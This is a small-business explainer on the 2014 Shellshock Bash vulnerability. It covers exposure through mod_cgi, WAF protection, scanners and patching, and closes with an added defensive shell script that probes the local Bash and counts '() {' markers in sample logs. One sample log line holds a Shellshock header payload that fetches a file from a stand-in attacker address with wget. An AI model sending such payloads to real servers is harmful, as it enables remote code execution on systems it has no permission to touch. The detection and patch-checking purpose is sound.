Just a few months ago, the Web was buzzing about the Heartbleed vulnerability. Now there’s a new security vulnerability in town — and its name is Shellshock.
“Bash Shell Shock,” as it is also known, was discovered and reported by French security researcher Stephane Chazelas earlier this month. The flaw itself had been present in Bash for over two decades, but nobody noticed it until now.
The Shellshock bug was first disclosed privately to software vendors so they could prepare patches, and only then made public. However, as these things typically go, hackers immediately piled on to see how far they could exploit it. By Thursday, September 25, 2014, attackers were already scanning websites to find out which ones were vulnerable.
Here are some questions and answers for small business owners about how Shellshock may or may not affect your business:
Who or what does Shellshock affect?
Shellshock is primarily a concern for Internet-connected Linux and UNIX computers. It is a vulnerability present in many servers connected to the Internet, including the servers that host websites, email, cloud software applications or networks.
The ultimate scope of the Shellshock bug is hard to fully map out, because the Web is so interconnected. Yes, hackers are targeting vulnerable Web servers. But it doesn’t stop there.
If a website or network is compromised as a result of Shellshock, that is of course bad news for the website or network. But visitors to a compromised website can also be affected down the line, because an attacker who controls a website can use it to push malware to the computers and devices of the people who visit it. Presumably, though, good antivirus/Internet security software should protect most individual computer users.
For most small businesses, though, the main concern is how to protect your website and/or network from Shellshock.
How do websites get exposed to Shellshock?
The primary exposure is on Linux and UNIX computers that use a program called Bash. Bash is a command shell: the program that runs commands and scripts on most Linux and UNIX systems, and one that other server software often calls behind the scenes. According to Incapsula, a Web security service:
“Much of the risk associated with Shellshock is derived from the fact that Bash is widely used by many Linux and UNIX servers. The vulnerability potentially allows unauthenticated attackers to remotely execute code on these machines, which enables data theft, malware injection and server hijacking.
As dangerous as this sounds, Shellshock can be contained.”
Security service Sucuri adds, however, that you shouldn’t be complacent just because you don’t think your website uses Bash directly.
Shellshock may affect Web servers that use certain functions within cPanel. cPanel is a popular back-end dashboard that many small business websites use to manage their servers and websites. The good news, if you can call it that, is that Shellshock does not affect every website using cPanel. It affects only those that use something called mod_cgi, but mod_cgi may be enabled even if you’re not aware of it. mod_cgi is the part of the Apache Web server that runs CGI scripts, and a CGI server hands pieces of each incoming Web request (for example the browser’s User-Agent header) to the script as environment variables. That is exactly how an attacker’s text reaches Bash: if the script is a Bash script or calls out to the shell, anyone who can send a Web request to it on an unpatched server can get commands run there, with no password required. See technical details at the Sucuri blog.
What happens to a Web server that is compromised?
If hackers get into a vulnerable server by exploiting the Shellshock bug, they can cause the usual kinds of damage:
- steal data,
- infect websites with malware,
- shut down networks, and
- harness machines into armies of botnets to launch attacks on other sites or computers.
What’s being done about Shellshock?
Luckily, large software providers, Web hosting companies, firewall providers and online security services are on it. They are issuing software patches, scanning for vulnerabilities and/or hardening their systems.
Amazon and Google both raced to respond to the Shellshock bug, according to the Wall Street Journal:
“Google has taken steps to fix the bug in both its internal servers and commercial cloud services, a person familiar with the matter said. Amazon released a bulletin Thursday that showed Amazon Web Services customers how to mitigate the problem.”
Amazon Web Services issued a blog post on the topic for customers who use its Web Services division, for example to host their sites or run applications. Amazon is applying patches, and has also announced that it will reboot about 10% of its servers over the coming week, which it says will mean a “few minutes” of interruption. The full Amazon post is here. [Note: this doesn’t affect the Amazon consumer ecommerce site that millions shop on. It relates only to companies that use Amazon Web Services.]
How do I protect my company’s website?
Practically speaking, your website is more likely to be at risk if you self-host with your own server(s) at your premises, or if you are responsible for managing your own hosting or network server(s). In those situations your in-house team has primary responsibility for checking and patching server software, and nobody else will do it for you.
If you’re not sure about your hosting situation, start by checking with your technical team. Ask how they are addressing the issue.
If you are a do-it-yourselfer or don’t have technical support available to help you, here are three ways to check your website and/or protect it:
1. If you use an outside hosting company, check with your host to see how they are handling Shellshock.
Most large and professional hosting companies have put, or are in the process of putting, patches in place for affected servers.
By now, they may even have posted something on their blogs, Twitter feeds or support forums. For example, here is BlueHost’s update about Shellshock.
2. Another way to protect your website is to put a Web application firewall / security service (“WAF”) in front of your website.
These services sit between the Internet and your site and block hackers, bad bots and other malicious traffic, while letting through traffic that doesn’t appear to pose a threat. For Shellshock specifically, WAF providers added rules that look for the tell-tale “() {” text in incoming request headers and block those requests. Keep in mind that this is a stopgap: it shields a server that has not yet been patched, but it is not a substitute for patching Bash itself.
To the human being who is a visitor or end-user, a Web firewall is invisible. But it protects your website from many vulnerabilities and attacks. (And you might be shocked to learn just how much activity hitting your site is bot traffic — you may not know until you put a firewall in place that tracks it.)
Today, these Web firewall services are affordable and pretty easy to implement. Prices start at $10 per month on the low end. On the high end, they go from several hundred dollars on up, for large and popular sites and platforms. But they are worth it for the peace of mind. Most are cloud-based services, meaning there’s no hardware to install. You purchase online, adjust some settings, and your site is protected. Many give you analytics to show you the volume of bad activity being kept out of your site.
Some Web firewall services include Incapsula, Cloudflare, Barracuda and Sucuri Firewall. However, if you sign up with a security provider, make sure the product you are buying is actually its firewall service. Many CDNs and security services offer different products or levels of service, and not all of them are Web firewalls.
And not all WAF firewalls are created equal. Some do a better job than others. So read reviews and do your research when choosing.
3. Test your domain for vulnerability.
This scanner can help: https://shellshock.detectify.com/
One caveat: an outside scanner can only try the Web addresses it knows about (typically common CGI paths), so a clean result does not prove the server is patched. The definitive check is to run the Bash test on the server itself, or to ask whoever manages it to confirm that the Bash package has been updated.
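As an added example (it is not from the original article, nor from Incapsula, Sucuri, Detectify or any other company named here), the script below shows in shell the three things the sections above describe: the one-line Bash test that the scanner in step 3 tries to perform from the outside, the way a CGI script under mod_cgi hands request headers to Bash (the exposure described under “How do websites get exposed to Shellshock?”), and the “() {” pattern a Web firewall, or a search of your own access log, looks for. It assumes a Linux/UNIX machine with Bash installed; the log lines and IP addresses in it are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the original article or from any vendor it names.
# Assumes a POSIX shell with `bash` on PATH. All sample data below is constructed.

# 1. The basic Shellshock probe (CVE-2014-6271). A shell variable whose value
#    begins with "() {" looks like an exported function definition. A vulnerable
#    bash, while importing its environment at startup, keeps parsing past the
#    closing brace and runs whatever follows ("echo vulnerable" here). A patched
#    bash treats the value as ordinary text and prints only "probe".
shellshock_status() {
  if ! command -v bash >/dev/null 2>&1; then
    echo "no-bash"
    return 0
  fi
  out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
  case "$out" in
    *vulnerable*) echo "vulnerable" ;;
    *)            echo "patched" ;;
  esac
}

# 2. Why mod_cgi matters. A CGI server copies request headers into environment
#    variables (User-Agent becomes HTTP_USER_AGENT) before starting the script.
#    The tiny CGI script below never reads that header, so the word INJECTED
#    can only appear in the output if bash executed the header value at startup.
cgi_injection_output() {
  script=$(mktemp) || return 1
  printf '%s\n' \
    '#!/bin/bash' \
    'echo "Content-Type: text/plain"' \
    'echo' \
    'echo "hello from cgi"' > "$script"
  HTTP_USER_AGENT='() { :;}; echo INJECTED' bash "$script" 2>/dev/null
  rm -f "$script"
}

cgi_was_injected() {
  case "$(cgi_injection_output)" in
    *INJECTED*) return 0 ;;   # payload ran: unpatched bash
    *)          return 1 ;;   # payload stayed inert: patched bash
  esac
}

# 3. What a WAF rule, or a grep over your own access log, looks for: the
#    "() {" marker in a request field. Constructed Apache-style log lines;
#    the IP addresses come from the reserved documentation ranges.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 35 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
198.51.100.9 - - [25/Sep/2014:10:01:05 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 35 "() { :;}; /usr/bin/wget http://203.0.113.5/x" "curl/7.37.0"'

count_shellshock_probes() {
  # Reads log lines on stdin; prints how many carry the marker.
  grep -Ec '\(\)[[:space:]]*\{' || true
}

# Stand-alone run: report the local bash status and the hits in the sample log.
echo "local bash: $(shellshock_status)"
if cgi_was_injected; then
  echo "cgi simulation: header payload executed"
else
  echo "cgi simulation: payload inert"
fi
echo "probe lines in sample log: $(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_probes)"
```

Save it under any name you like (say shellshock-check.sh) and run it as an ordinary user on the server you want to check with `sh shellshock-check.sh`. On a patched system it prints `local bash: patched`, `cgi simulation: payload inert`, and reports two probe lines in the sample log. Note that the first Bash patch released in September 2014 was incomplete, so “patched” here means only that this particular probe is blocked; make sure your distribution’s follow-up Bash updates are installed as well.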
What about visiting websites — can I or my staff be infected just by surfing online?
Individual users — including your employees — will need to be concerned with protecting against the residual effects of a compromised website, Web application or network.
For example, let’s say a website ends up being infected with malware as a result of Shellshock. In that situation, visitors to the infected website could be at risk from malware such as viruses. In other words, even if your computer is not directly vulnerable to Shellshock, you could still “catch a virus” from a compromised website.
A key precaution, as always, is to install antivirus/Internet security software on individual computers and keep it updated.
More Shellshock Resources
Check out this YouTube video explaining Shellshock. It’s a good explanation in about 4 minutes: